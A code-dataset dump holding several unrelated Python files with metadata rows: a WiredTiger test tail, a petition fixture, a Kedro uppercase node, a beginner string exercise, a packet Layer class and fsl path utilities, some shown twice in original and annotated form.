        # Close the initial connection. We will be opening new connections with different verbosity settings throughout
        # this test.
        self.close_conn()
        expected_verbose_categories = {
            'WT_VERB_DEFAULT': wiredtiger.WT_VERB_DEFAULT,
        }
        # Test generating an error message, ensuring the JSON output is valid.
        with self.expect_event_handler_json('', expected_verbose_categories, stdErr=True) as conn:
            # Attempt to begin a read transaction with an invalid timestamp, inorder to produce an error message.
            uri = 'table:test_verbose03_error'
            session = conn.open_session()
            session.create(uri, 'key_format=S,value_format=S')
            c = session.open_cursor(uri)
            try:
                session.begin_transaction('read_timestamp=-1')
            except wiredtiger.WiredTigerError:
                # We intend to generate a WiredTigerError. Catch and move forward.
                pass
            c.close()
            session.close()
if __name__ == '__main__':
wttest.run()
| 5,039 | 440 | 22 |
b69313242ff3954bc2e977fe3a858149821e416d | 257 | py | Python | app/api/db/petition_test_data.py | ChegeBryan/politico | 746ef4c76931928ef145593092c8b391421a50fd | [
"MIT"
] | 1 | 2021-09-08T13:17:03.000Z | 2021-09-08T13:17:03.000Z | app/api/db/petition_test_data.py | ChegeBryan/politico | 746ef4c76931928ef145593092c8b391421a50fd | [
"MIT"
] | 62 | 2019-02-04T07:08:32.000Z | 2021-05-06T19:49:03.000Z | app/api/db/petition_test_data.py | ChegeBryan/politico | 746ef4c76931928ef145593092c8b391421a50fd | [
"MIT"
] | 5 | 2019-02-11T18:21:14.000Z | 2022-02-25T07:41:07.000Z | # petition test dummy data
petition = {
"office": 1,
"contested_by": 2,
"body": "some string",
"evidence": ['https://image.url']
}
invalid_petition_data = {
"office": "Not integer",
"body": 2,
"evidence": "Not a list of url"
}
| 17.133333 | 37 | 0.571984 | # petition test dummy data
# Well-formed petition payload: a happy-path fixture for tests.
petition = {
    "office": 1,
    "contested_by": 2,
    "body": "some string",
    "evidence": ['https://image.url']
}
# Deliberately malformed payload - each field carries the wrong type -
# used to exercise input validation.
invalid_petition_data = {
    "office": "Not integer",
    "body": 2,
    "evidence": "Not a list of url"
}
| 0 | 0 | 0 |
873a65b9ef155fde35bc54bd1a84d03fd2c17704 | 451 | py | Python | src/kedro_devops/pipelines/data_engineering/nodes/transform_uppercase.py | julianlrcsumz/kedro-devops | 873fbd35a1c47d1b97786e516d70b1b9ece83664 | [
"MIT"
] | null | null | null | src/kedro_devops/pipelines/data_engineering/nodes/transform_uppercase.py | julianlrcsumz/kedro-devops | 873fbd35a1c47d1b97786e516d70b1b9ece83664 | [
"MIT"
] | null | null | null | src/kedro_devops/pipelines/data_engineering/nodes/transform_uppercase.py | julianlrcsumz/kedro-devops | 873fbd35a1c47d1b97786e516d70b1b9ece83664 | [
"MIT"
] | 4 | 2021-10-15T13:36:53.000Z | 2021-11-12T16:16:50.000Z | import pandas as pd
from requests import Response
def transform_uppercase(data_set: Response) -> pd.DataFrame:
"""
Transform a lowercase dataframe to uppercase.
Args:
data (pd.DataFrame): A raw dataframe
Returns:
pd.DataFrame: An uppercase dataframe
"""
json_data = data_set.json()
pokemons = json_data.get("results")
data = pd.json_normalize(pokemons)
return data.applymap(lambda x: x.upper())
| 23.736842 | 60 | 0.68071 | import pandas as pd
from requests import Response
def transform_uppercase(data_set: Response) -> pd.DataFrame:
    """
    Transform a lowercase dataframe to uppercase.

    Args:
        data_set (Response): HTTP response whose JSON body carries a
            ``results`` list of records (e.g. the pokeapi listing).

    Returns:
        pd.DataFrame: An uppercase dataframe
    """
    json_data = data_set.json()
    # Flatten the list of JSON records into one row per record.
    pokemons = json_data.get("results")
    data = pd.json_normalize(pokemons)
    # NOTE(review): assumes every normalized cell is a string -
    # a non-string value would raise AttributeError on .upper().
    return data.applymap(lambda x: x.upper())
| 0 | 0 | 0 |
23660dc491a39ae78ddad366f825d8b7d3630c41 | 535 | py | Python | CURSO UDEMY/TEORICAS/5.py | CamilliCerutti/Exercicios-de-Python-curso-em-video | 6571a5c5cb7b4398352a7778c55588c0c16f13c2 | [
"MIT"
] | null | null | null | CURSO UDEMY/TEORICAS/5.py | CamilliCerutti/Exercicios-de-Python-curso-em-video | 6571a5c5cb7b4398352a7778c55588c0c16f13c2 | [
"MIT"
] | null | null | null | CURSO UDEMY/TEORICAS/5.py | CamilliCerutti/Exercicios-de-Python-curso-em-video | 6571a5c5cb7b4398352a7778c55588c0c16f13c2 | [
"MIT"
] | null | null | null | frase = 'O rato roeu a roupa do rei de roma'
tamanho = len(frase)
contador = 0
nova_string = ''
print(frase)

# Keep prompting until the user picks something that occurs in the text.
while True:
    input_do_usuario = input('Qual letra voce deseja colocar maiuscula: ')
    if input_do_usuario not in frase:
        print('Escolha uma letra que esteja no texto')
    else:
        break

# Copy the text character by character, uppercasing each match.
for letra in frase:
    if letra == input_do_usuario:
        nova_string += input_do_usuario.upper()
    else:
        nova_string += letra
    contador += 1
print(nova_string) | 21.4 | 74 | 0.657944 | frase = 'O rato roeu a roupa do rei de roma'
tamanho = len(frase)
contador = 0
nova_string = ''
print(frase)
while True:
input_do_usuario = input('Qual letra voce deseja colocar maiuscula: ')
if input_do_usuario not in frase:
print('Escolha uma letra que esteja no texto')
else:
break
while contador < tamanho:
letra = frase[contador]
if letra == input_do_usuario:
nova_string += input_do_usuario.upper()
else:
nova_string += letra
contador += 1
print(nova_string) | 0 | 0 | 0 |
9cf65e28a279c6041cf2dd8a3d2c3545e5e2c9ed | 2,994 | py | Python | Layer.py | orishamir/OriScapy | 68acbe9c4ccefcdf611de58277e64a4055111a58 | [
"MIT"
] | null | null | null | Layer.py | orishamir/OriScapy | 68acbe9c4ccefcdf611de58277e64a4055111a58 | [
"MIT"
] | null | null | null | Layer.py | orishamir/OriScapy | 68acbe9c4ccefcdf611de58277e64a4055111a58 | [
"MIT"
] | null | null | null | from abc import ABCMeta, abstractmethod
from colorama import init, Fore, Style
RST = Style.RESET_ALL
init() | 31.851064 | 147 | 0.514696 | from abc import ABCMeta, abstractmethod
from colorama import init, Fore, Style
RST = Style.RESET_ALL
init()
class Layer(metaclass=ABCMeta):
def __truediv__(self, other):
if hasattr(self, 'data'):
self.data = self.data / other
else:
self.data = other
return self
def __rtruediv__(self, other):
self.data = other
return self
def __itruediv__(self, other):
return self / other
def __str__(self):
#self._autocomplete()
ret = f" {Fore.LIGHTRED_EX}\033[1m[{self.__class__.__name__}]{RST} \n"
all_attr = self.__dict__
for key, val in all_attr.items():
if key == 'data':
continue
if key in ("lladdr", ):
continue
if 'port' not in key and key != 'ttl' and key not in ['qd', 'an', 'ns', 'ar'] and val not in (0,1) and isinstance(val, int):
val = hex(val)
if key in ('qd', 'an') and val:
ret += f" {Fore.MAGENTA}{key}{RST}="
for dnsr in val:
dnsr = f'\n{" "*12}'.join(str(dnsr).split('\n'))
ret += f" {Fore.LIGHTGREEN_EX} {dnsr}{RST}\n"
elif key == '_options':
ret += f" {Fore.MAGENTA}options{RST}="
else:
ret += f" {Fore.MAGENTA}{key:<15} {RST}={Fore.LIGHTGREEN_EX} {val}{RST}\n"
if (hasattr(self, 'data') and not isinstance(self.data, bytes) and self.data is not None) or (hasattr(self, '_options') and self._options):
ret += '\n'
if hasattr(self, 'data'):
s = str(self.data)
elif hasattr(self, '_options'):
s = ''
for opt in self._options:
s += f"{opt}\n"
s = [f" {i}" for i in s.splitlines()]
ret += '\n '.join(s)
return ret
def __contains__(self, item):
if isinstance(self, item):
return True
if not hasattr(self, 'data'):
return False
if isinstance(self.data, bytes):
return False
return item in self.data
def __getitem__(self, item):
if item not in self:
raise KeyError(f"{item.__name__} does not exist.")
if isinstance(self, item):
return self
return self.data[item]
def __getattr__(self, name):
"""
Custom functionality of pkt.attr, so for example
IP attributes are accessible from Ether layer forward
:param name: str
:return:
"""
if name in self.__dict__:
return self.__dict__[name]
if 'data' not in self.__dict__:
raise AttributeError(f"No attribute {name}")
return getattr(self.data, name)
def __len__(self):
return len(bytes(self))
def _autocomplete(self):
pass
def __bytes__(self):
return | 2,183 | 681 | 23 |
0a0859528945a7b944482442b0ffc658d0dc05f9 | 18,295 | py | Python | fsl/utils/path.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | null | null | null | fsl/utils/path.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | null | null | null | fsl/utils/path.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# path.py - Utility functions for working with file/directory paths.
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
"""This module contains a few utility functions for working with file system
paths.
.. autosummary::
:nosignatures:
deepest
shallowest
allFiles
hasExt
addExt
removeExt
getExt
splitExt
getFileGroup
removeDuplicates
uniquePrefix
commonBase
wslpath
winpath
"""
import os.path as op
import os
import glob
import operator
import re
from fsl.utils.platform import platform
class PathError(Exception):
    """``Exception`` class raised by the functions defined in this module
    when something goes wrong.
    """
def deepest(path, suffixes):
    """Finds the deepest directory which ends with one of the given
    sequence of suffixes, or returns ``None`` if no directories end
    with any of the suffixes.

    :arg path:     Path to search.
    :arg suffixes: Sequence of suffix strings to match against.
    """

    path = path.strip()

    # Recursion base case - we have
    # reached the file system root.
    if path == op.sep or path == '':
        return None

    path = path.rstrip(op.sep)

    # Generator expression - no need to build
    # an intermediate list just to call any().
    if any(path.endswith(s) for s in suffixes):
        return path

    return deepest(op.dirname(path), suffixes)
def shallowest(path, suffixes):
    """Finds the shallowest directory which ends with one of the given
    sequence of suffixes, or returns ``None`` if no directories end
    with any of the suffixes.

    :arg path:     Path to search.
    :arg suffixes: Sequence of suffix strings to match against.
    """

    path = path.strip()

    # We've reached the root of the file system
    if path == op.sep or path == '' or op.splitdrive(path)[1] == '':
        return None

    path   = path.rstrip(op.sep)

    # Recurse towards the root first, so the
    # shallowest matching ancestor wins.
    parent = shallowest(op.dirname(path), suffixes)

    if parent is not None:
        return parent

    # Generator expression - no need to build
    # an intermediate list just to call any().
    if any(path.endswith(s) for s in suffixes):
        return path

    return None
def allFiles(root):
    """Return a list containing all files which exist underneath the specified
    ``root`` directory.
    """
    # os.walk yields one (dirpath, dirnames, filenames) tuple per
    # directory; flatten the file names into full paths.
    return [op.join(dirpath, filename)
            for dirpath, _, filenames in os.walk(root)
            for filename in filenames]
def hasExt(path, allowedExts):
    """Convenience function which returns ``True`` if the given ``path``
    ends with any of the given ``allowedExts``, ``False`` otherwise.
    """
    # str.endswith accepts a tuple of candidate suffixes,
    # so a single call covers all of them.
    return path.endswith(tuple(allowedExts))
def addExt(prefix,
           allowedExts=None,
           mustExist=True,
           defaultExt=None,
           fileGroups=None,
           unambiguous=True):
    """Adds a file extension to the given file ``prefix``.

    If ``mustExist`` is False, and the file does not already have a
    supported extension, the default extension is appended and the new
    file name returned. If the prefix already has a supported extension,
    it is returned unchanged.

    If ``mustExist`` is ``True`` (the default), the function checks to see
    if any files exist that have the given prefix, and a supported file
    extension. A :exc:`PathError` is raised if:

       - No files exist with the given prefix and a supported extension.
       - ``fileGroups is None`` and ``unambiguous is True``, and more than
         one file exists with the given prefix, and a supported extension.

    Otherwise the full file name is returned.

    :arg prefix:      The file name prefix to modify.
    :arg allowedExts: List of allowed file extensions.
    :arg mustExist:   Whether the file must exist or not.
    :arg defaultExt:  Default file extension to use.
    :arg fileGroups:  Recognised file groups - see :func:`getFileGroup`.
    :arg unambiguous: If ``True`` (the default), and more than one file
                      exists with the specified ``prefix``, a
                      :exc:`PathError` is raised. Otherwise, a list
                      containing *all* matching files is returned.
    """

    # BUG FIX: work on a copy of allowedExts, so that
    # appending the default extension below does not
    # mutate the caller's list.
    if allowedExts is None: allowedExts = []
    else:                   allowedExts = list(allowedExts)
    if fileGroups  is None: fileGroups  = {}

    if defaultExt is not None and defaultExt not in allowedExts:
        allowedExts.append(defaultExt)

    if not mustExist:

        # the provided file name already
        # ends with a supported extension
        if hasExt(prefix, allowedExts):
            return prefix

        if defaultExt is not None: return prefix + defaultExt
        else:                      return prefix

    # If no allowed extensions were
    # provided, or the provided prefix
    # already ends with a supported
    # extension, check to see that it
    # exists.
    if len(allowedExts) == 0 or hasExt(prefix, allowedExts):
        allPaths = [prefix]

    # Otherwise, make a bunch of file names, one per
    # supported extension, and test to see if exactly
    # one of them exists.
    else:
        allPaths = [prefix + ext for ext in allowedExts]

    allPaths = [p for p in allPaths if op.isfile(p)]
    nexists  = len(allPaths)

    # Could not find any supported file
    # with the specified prefix
    if nexists == 0:
        raise PathError('Could not find a supported file '
                        'with prefix "{}"'.format(prefix))

    # If ambiguity is ok, return
    # all matching paths
    elif not unambiguous:
        return allPaths

    # Ambiguity is not ok! More than
    # one supported file with the
    # specified prefix.
    elif nexists > 1:

        # Remove non-existent paths from the
        # extended list, get all their
        # suffixes, and see if they match
        # any file groups.
        suffixes     = [getExt(p, allowedExts) for p in allPaths]
        groupMatches = [sorted(suffixes) == sorted(g) for g in fileGroups]

        # Is there a match for a file suffix group?
        # If not, multiple files with the specified
        # prefix exist, and there is no way to
        # resolve the ambiguity.
        if sum(groupMatches) != 1:
            raise PathError('More than one file with '
                            'prefix "{}"'.format(prefix))

        # Otherwise, we return a path
        # to the file which matches the
        # first suffix in the group.
        groupIdx = groupMatches.index(True)
        allPaths = [prefix + fileGroups[groupIdx][0]]

    # Return the full file name of the
    # supported file that was found
    return allPaths[0]
def removeExt(filename, allowedExts=None, firstDot=False):
    """Returns the base name of the given file name. See :func:`splitExt`. """
    base, _ext = splitExt(filename, allowedExts, firstDot)
    return base
def getExt(filename, allowedExts=None, firstDot=False):
    """Returns the extension of the given file name. See :func:`splitExt`. """
    _base, ext = splitExt(filename, allowedExts, firstDot)
    return ext
def splitExt(filename, allowedExts=None, firstDot=False):
    """Returns the base name and the extension from the given file name.

    If ``allowedExts`` is ``None`` and ``firstDot`` is ``False``, this is
    equivalent to ``os.path.splitext(filename)``.  If ``firstDot`` is
    ``True``, the name is split on the *first* period instead of the
    last, e.g.::

        splitExt('image.nii.gz')                # -> ('image.nii', '.gz')
        splitExt('image.nii.gz', firstDot=True) # -> ('image', '.nii.gz')

    If ``allowedExts`` is provided, ``firstDot`` is ignored, and the name
    is split on the first matching extension; ``(filename, '')`` is
    returned when no extension matches.

    :arg filename:    The file name to split.
    :arg allowedExts: Allowed/recognised file extensions.
    :arg firstDot:    Split on the first period rather than the last.
                      Ignored if ``allowedExts`` is specified.
    """

    # No recognised extensions were given -
    # split on a period character instead.
    if allowedExts is None:

        # Split on the last period - this is
        # exactly what os.path.splitext does.
        if not firstDot:
            return op.splitext(filename)

        # Split on the first period, if there is one.
        base, sep, rest = filename.partition('.')
        if sep == '':
            return filename, ''
        return base, sep + rest

    # Otherwise return the first matching suffix,
    # in the order the extensions were specified.
    for ext in allowedExts:
        if filename.endswith(ext):
            extLen = len(ext)
            return filename[:-extLen], filename[-extLen:]

    # No match - assume there is no extension.
    return filename, ''
def getFileGroup(path,
                 allowedExts=None,
                 fileGroups=None,
                 fullPaths=True,
                 unambiguous=False):
    """If the given ``path`` is part of a ``fileGroup``, returns a list
    containing the paths to all other files in the group (including the
    ``path`` itself).
    If the ``path`` does not appear to be part of a file group, or appears to
    be part of an incomplete file group, a list containing only the ``path``
    is returned.
    If the ``path`` does not exist, or appears to be part of more than one
    file group, a :exc:`PathError` is raised.
    File groups can be used to specify a collection of file suffixes which
    should always exist alongside each other. This can be used to resolve
    ambiguity when multiple files exist with the same ``prefix`` and supported
    extensions (e.g. ``file.hdr`` and ``file.img``). The file groups are
    specified as a list of sequences, for example::
        [('.img', '.hdr'),
         ('.img.gz', '.hdr.gz')]
    If you specify ``fileGroups=[('.img', '.hdr')]`` and ``prefix='file'``, and
    both ``file.img`` and ``file.hdr`` exist, the :func:`addExt` function would
    return ``file.img`` (i.e. the file which matches the first extension in
    the group).
    Similarly, if you call the :func:`.imcp.imcp` or :func:`.imcp.immv`
    functions with the above parameters, both ``file.img`` and ``file.hdr``
    will be moved.
    .. note:: The primary use-case of file groups is to resolve ambiguity with
              respect to NIFTI and ANALYSE75 image pairs. By specifying
              ``fileGroups=[('.img', '.hdr'), ('.img.gz', '.hdr.gz')]``, the
              :func:`addExt`, :func:`.imcp.immv` and :func:`.imcp.imcp`
              functions are able to figure out what you mean when you specify
              ``file``, and both ``file.hdr`` and ``file.img`` (or
              ``file.hdr.gz`` and ``file.img.gz``) exist.
    :arg path:        Path to the file. Must contain the file extension.
    :arg allowedExts: Allowed/recognised file extensions.
    :arg fileGroups:  Recognised file groups.
    :arg fullPaths:   If ``True`` (the default), full file paths (relative to
                      the ``path``) are returned. Otherwise, only the file
                      extensions in the group are returned.
    :arg unambiguous: Defaults to ``False``. If ``True``, and the path
                      is not unambiguously part of one group, or part of
                      no groups, a :exc:`PathError` is raised.
                      Otherwise, the path is returned.
    """
    # Resolve the path to an existing file, then split
    # off its (recognised) extension.
    path = addExt(path, allowedExts, mustExist=True, fileGroups=fileGroups)
    base, ext = splitExt(path, allowedExts)
    # No file groups - the path can only belong to itself.
    if fileGroups is None:
        if fullPaths: return [path]
        else: return [ext]
    matchedGroups = []
    matchedGroupFiles = []
    fullMatches = 0
    partialMatches = 0
    # Count, for each candidate group, whether some
    # (partial) or all (full) of its members exist.
    for group in fileGroups:
        if ext != '' and ext not in group:
            continue
        groupFiles = [base + s for s in group]
        exist = [op.exists(f) for f in groupFiles]
        if any(exist):
            partialMatches += 1
        if all(exist):
            fullMatches += 1
            matchedGroups .append(group)
            matchedGroupFiles.append(groupFiles)
    # Path is not part of any group
    if partialMatches == 0:
        if fullPaths: return [path]
        else: return [ext]
    # If the given path is part of more
    # than one existing file group, we
    # can't resolve this ambiguity.
    if fullMatches > 1:
        raise PathError('Path is part of multiple '
                        'file groups: {}'.format(path))
    # If the unambiguous flag is not set,
    # we don't care about partial matches
    if not unambiguous:
        partialMatches = 0
    # The path is unambiguously part of a
    # complete file group - resolve it to
    # the first element of the group
    if fullMatches == 1 and partialMatches <= 1:
        if fullPaths: return matchedGroupFiles[0]
        else: return matchedGroups[ 0]
    # The path appears to be part of
    # an incomplete group - this is
    # potentially ambiguous, so give
    # up (but see the partialMatches
    # clobber above).
    elif partialMatches > 0:
        raise PathError('Path is part of an incomplete '
                        'file group: {}'.format(path))
    else:
        if fullPaths: return [path]
        else: return [ext]
def removeDuplicates(paths, allowedExts=None, fileGroups=None):
"""Reduces the list of ``paths`` down to those which are unique with
respect to the specified ``fileGroups``.
For example, if you have a directory containing::
001.hdr
001.img
002.hdr
002.img
003.hdr
003.img
And you call ``removeDuplicates`` like so::
paths = ['001.img', '001.hdr',
'002.img', '002.hdr',
'003.img', '003.hdr']
allowedExts = ['.img', '.hdr']
fileGroups = [('.img', '.hdr')]
removeDuplicates(paths, allowedExts, fileGroups)
The returned list will be::
['001.img', '002.img', '003.img']
If you provide ``allowedExts``, you may specify incomplete ``paths`` (i.e.
without extensions), as long as there are no path ambiguities.
A :exc:`PathError` will be raised if any of the ``paths`` do not exist,
or if there are any ambiguities with respect to incomplete paths.
:arg paths: List of paths to reduce.
:arg allowedExts: Allowed/recognised file extensions.
:arg fileGroups: Recognised file groups - see :func:`getFileGroup`.
"""
unique = []
for path in paths:
groupFiles = getFileGroup(path, allowedExts, fileGroups)
if not any([p in unique for p in groupFiles]):
unique.append(groupFiles[0])
return unique
def uniquePrefix(path):
"""Return the longest prefix for the given file name which unambiguously
identifies it, relative to the other files in the same directory.
Raises a :exc:`PathError` if a unique prefix could not be found (which
will never happen if the path is valid).
"""
dirname, filename = op.split(path)
idx = 0
prefix = op.join(dirname, filename[0])
hits = glob.glob('{}*'.format(prefix))
while True:
# Found a unique prefix
if len(hits) == 1:
break
# Should never happen if path is valid
elif len(hits) == 0 or idx >= len(filename) - 1:
raise PathError('No unique prefix for {}'.format(filename))
# Not unique - continue looping
else:
idx += 1
prefix = prefix + filename[idx]
hits = [h for h in hits if h.startswith(prefix)]
return prefix
def commonBase(paths):
    """Identifies the deepest common base directory shared by all files
    in ``paths``.

    Raises a :exc:`PathError` if the paths have no common base. This will
    never happen for absolute paths (as the base will be e.g. ``'/'``).
    """
    # Start from the deepest path, and walk up towards the root, stopping
    # at the first ancestor directory which contains every path.
    depths = [len(p.split(op.sep)) for p in paths]
    base = max(zip(depths, paths), key=operator.itemgetter(0))[1]
    last = base
    while True:
        base = op.split(base)[0]
        if base == last or len(base) == 0:
            break
        last = base
        # Compare on a directory boundary: a plain startswith() check
        # would wrongly accept '/a/bc' as being under the base '/a/b'.
        candidate = base if base.endswith(op.sep) else base + op.sep
        if all(p == base or p.startswith(candidate) for p in paths):
            return base
    raise PathError('No common base')
def wslpath(winpath):
    """
    Convert a Windows path (or a command line argument containing a Windows
    path) to the equivalent WSL path (e.g. ``c:\\Users`` -> ``/mnt/c/Users``).
    Also supports paths in the form ``\\wsl$\\(distro)\\users\\...``.

    :param winpath: Command line argument which may (or may not) contain a
                    Windows path. It is assumed to be either of the form
                    <windows path> or --<arg>=<windows path>. Note that we
                    don't need to handle --arg <windows path> or
                    -a <windows path> since in these cases the argument and
                    the path will be parsed as separate entities.
    :return:        If ``winpath`` matches a Windows path, the converted
                    argument (including the --<arg>= portion). Otherwise
                    returns ``winpath`` unchanged.
    """
    # \\wsl$\<distro>\... network paths map directly onto the distro root.
    match = re.match(r"^(--[\w-]+=)?\\\\wsl\$[\\\/][^\\^\/]+(.*)$", winpath)
    if match:
        arg, path = match.group(1, 2)
        if arg is None:
            arg = ""
        return arg + path.replace("\\", "/")
    # Drive-letter paths (c:\...) map onto /mnt/<drive>/...
    # The drive class is [a-zA-Z]: the previous [a-zA-z] range also
    # matched the punctuation characters between 'Z' and 'a' and '_'.
    match = re.match(r"^(--[\w-]+=)?([a-zA-Z]):(.+)$", winpath)
    if match:
        arg, drive, path = match.group(1, 2, 3)
        if arg is None:
            arg = ""
        return arg + "/mnt/" + drive.lower() + path.replace("\\", "/")
    return winpath
def winpath(wslpath):
"""
Convert a WSL-local filepath (for example ``/usr/local/fsl/``) into a path that can be used from
Windows.
If ``self.fslwsl`` is ``False``, simply returns ``wslpath`` unmodified
Otherwise, uses ``FSLDIR`` to deduce the WSL distro in use for FSL.
This requires WSL2 which supports the ``\\wsl$\`` network path.
wslpath is assumed to be an absolute path.
"""
if not platform.fslwsl:
return wslpath
else:
match = re.match(r"^\\\\wsl\$\\([^\\]+).*$", platform.fsldir)
if match:
distro = match.group(1)
else:
distro = None
if not distro:
raise RuntimeError("Could not identify WSL installation from FSLDIR (%s)" % platform.fsldir)
return "\\\\wsl$\\" + distro + wslpath.replace("/", "\\")
| 31.166951 | 108 | 0.607598 | #!/usr/bin/env python
#
# path.py - Utility functions for working with file/directory paths.
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
"""This module contains a few utility functions for working with file system
paths.
.. autosummary::
:nosignatures:
deepest
shallowest
allFiles
hasExt
addExt
removeExt
getExt
splitExt
getFileGroup
removeDuplicates
uniquePrefix
commonBase
wslpath
winpath
"""
import os.path as op
import os
import glob
import operator
import re
from fsl.utils.platform import platform
class PathError(Exception):
    """Raised by the path-manipulation functions in this module when an
    operation cannot be completed - e.g. a file is missing, or a path is
    ambiguous with respect to the supplied extensions/file groups.
    """
def deepest(path, suffixes):
    """Return the deepest directory along ``path`` (including the path
    itself) whose name ends with one of the given ``suffixes``, or
    ``None`` if no ancestor matches.
    """
    current = path.strip()
    # Walk up towards the filesystem root, testing each ancestor in turn.
    while current not in ('', op.sep):
        current = current.rstrip(op.sep)
        if any(current.endswith(sfx) for sfx in suffixes):
            return current
        current = op.dirname(current)
    return None
def shallowest(path, suffixes):
    """Return the shallowest directory along ``path`` (including the path
    itself) whose name ends with one of the given ``suffixes``, or
    ``None`` if no ancestor matches.
    """
    path = path.strip()
    # We've reached the root of the file system (the drive check handles
    # Windows-style paths).
    if path in ('', op.sep) or op.splitdrive(path)[1] == '':
        return None
    path = path.rstrip(op.sep)
    # Prefer a match from further up the tree; fall back to this level.
    found = shallowest(op.dirname(path), suffixes)
    if found is None and any(path.endswith(sfx) for sfx in suffixes):
        found = path
    return found
def allFiles(root):
    """Return a list of all files which exist underneath the specified
    ``root`` directory (paths are prefixed with ``root``).
    """
    return [op.join(dirpath, name)
            for dirpath, _, filenames in os.walk(root)
            for name in filenames]
def hasExt(path, allowedExts):
    """Return ``True`` if ``path`` ends with any of the extensions in
    ``allowedExts``, ``False`` otherwise.
    """
    return any(map(path.endswith, allowedExts))
def addExt(prefix,
           allowedExts=None,
           mustExist=True,
           defaultExt=None,
           fileGroups=None,
           unambiguous=True):
    """Adds a file extension to the given file ``prefix``.
    If ``mustExist`` is False, and the file does not already have a
    supported extension, the default extension is appended and the new
    file name returned. If the prefix already has a supported extension,
    it is returned unchanged.
    If ``mustExist`` is ``True`` (the default), the function checks to see
    if any files exist that have the given prefix, and a supported file
    extension. A :exc:`PathError` is raised if:
    - No files exist with the given prefix and a supported extension.
    - ``fileGroups is None`` and ``unambiguous is True``, and more than
      one file exists with the given prefix, and a supported extension.
    Otherwise the full file name is returned.
    :arg prefix: The file name prefix to modify.
    :arg allowedExts: List of allowed file extensions.
    :arg mustExist: Whether the file must exist or not.
    :arg defaultExt: Default file extension to use.
    :arg fileGroups: Recognised file groups - see :func:`getFileGroup`.
    :arg unambiguous: If ``True`` (the default), and more than one file
                      exists with the specified ``prefix``, a
                      :exc:`PathError` is raised. Otherwise, a list
                      containing *all* matching files is returned.
    """
    # NOTE(review): the empty default here is a dict, but fileGroups is
    # later indexed like a sequence of suffix groups (fileGroups[groupIdx]
    # below); an empty list would be clearer. Harmless as-is, because the
    # indexing is only reached when a group actually matched.
    if allowedExts is None: allowedExts = []
    if fileGroups is None: fileGroups = {}
    # NOTE(review): this appends to a caller-supplied allowedExts list in
    # place - consider copying the list first.
    if defaultExt is not None and defaultExt not in allowedExts:
        allowedExts.append(defaultExt)
    if not mustExist:
        # the provided file name already
        # ends with a supported extension
        if hasExt(prefix, allowedExts):
            return prefix
        if defaultExt is not None: return prefix + defaultExt
        else: return prefix
    # If no allowed extensions were
    # provided, or the provided prefix
    # already ends with a supported
    # extension, check to see that it
    # exists.
    if len(allowedExts) == 0 or hasExt(prefix, allowedExts):
        allPaths = [prefix]
    # Otherwise, make a bunch of file names, one per
    # supported extension, and test to see if exactly
    # one of them exists.
    else:
        allPaths = [prefix + ext for ext in allowedExts]
    # Keep only the candidates that exist on disk.
    allPaths = [p for p in allPaths if op.isfile(p)]
    nexists = len(allPaths)
    # Could not find any supported file
    # with the specified prefix
    if nexists == 0:
        raise PathError('Could not find a supported file '
                        'with prefix "{}"'.format(prefix))
    # If ambiguity is ok, return
    # all matching paths
    elif not unambiguous:
        return allPaths
    # Ambiguity is not ok! More than
    # one supported file with the
    # specified prefix.
    elif nexists > 1:
        # Remove non-existent paths from the
        # extended list, get all their
        # suffixes, and see if they match
        # any file groups.
        suffixes = [getExt(p, allowedExts) for p in allPaths]
        groupMatches = [sorted(suffixes) == sorted(g) for g in fileGroups]
        # Is there a match for a file suffix group?
        # If not, multiple files with the specified
        # prefix exist, and there is no way to
        # resolve the ambiguity.
        if sum(groupMatches) != 1:
            raise PathError('More than one file with '
                            'prefix "{}"'.format(prefix))
        # Otherwise, we return a path
        # to the file which matches the
        # first suffix in the group.
        groupIdx = groupMatches.index(True)
        allPaths = [prefix + fileGroups[groupIdx][0]]
    # Return the full file name of the
    # supported file that was found
    return allPaths[0]
def removeExt(filename, allowedExts=None, firstDot=False):
    """Return ``filename`` with its extension removed (see :func:`splitExt`)."""
    base, _ = splitExt(filename, allowedExts, firstDot)
    return base
def getExt(filename, allowedExts=None, firstDot=False):
    """Return the extension of ``filename`` (see :func:`splitExt`)."""
    _, ext = splitExt(filename, allowedExts, firstDot)
    return ext
def splitExt(filename, allowedExts=None, firstDot=False):
    """Split ``filename`` into a ``(base, extension)`` tuple.

    With ``allowedExts=None`` and ``firstDot=False`` this behaves exactly
    like ``os.path.splitext``. With ``firstDot=True`` the name is split at
    the *first* period rather than the last, so multi-part suffixes stay
    together, e.g.::

        splitExt('image.nii.gz')                 # -> ('image.nii', '.gz')
        splitExt('image.nii.gz', firstDot=True)  # -> ('image', '.nii.gz')

    When ``allowedExts`` is given, ``firstDot`` is ignored: the first
    extension in the list which matches the end of ``filename`` is split
    off, and ``(filename, '')`` is returned when none match.

    :arg filename:    The file name to split.
    :arg allowedExts: Allowed/recognised file extensions.
    :arg firstDot:    Split on the first period rather than the last.
    """
    if allowedExts is None:
        if not firstDot:
            # Same semantics as the standard library.
            return op.splitext(filename)
        # Split at the first period, if there is one.
        base, dot, rest = filename.partition('.')
        return (base, dot + rest) if dot else (filename, '')
    # Split off the first allowed extension that matches.
    for ext in allowedExts:
        if filename.endswith(ext):
            cut = len(ext)
            return filename[:-cut], filename[-cut:]
    # No recognised extension - assume there is none.
    return filename, ''
def getFileGroup(path,
                 allowedExts=None,
                 fileGroups=None,
                 fullPaths=True,
                 unambiguous=False):
    """If the given ``path`` is part of a ``fileGroup``, returns a list
    containing the paths to all other files in the group (including the
    ``path`` itself).
    If the ``path`` does not appear to be part of a file group, or appears to
    be part of an incomplete file group, a list containing only the ``path``
    is returned.
    If the ``path`` does not exist, or appears to be part of more than one
    file group, a :exc:`PathError` is raised.
    File groups can be used to specify a collection of file suffixes which
    should always exist alongside each other. This can be used to resolve
    ambiguity when multiple files exist with the same ``prefix`` and supported
    extensions (e.g. ``file.hdr`` and ``file.img``). The file groups are
    specified as a list of sequences, for example::
    [('.img', '.hdr'),
     ('.img.gz', '.hdr.gz')]
    If you specify ``fileGroups=[('.img', '.hdr')]`` and ``prefix='file'``, and
    both ``file.img`` and ``file.hdr`` exist, the :func:`addExt` function would
    return ``file.img`` (i.e. the file which matches the first extension in
    the group).
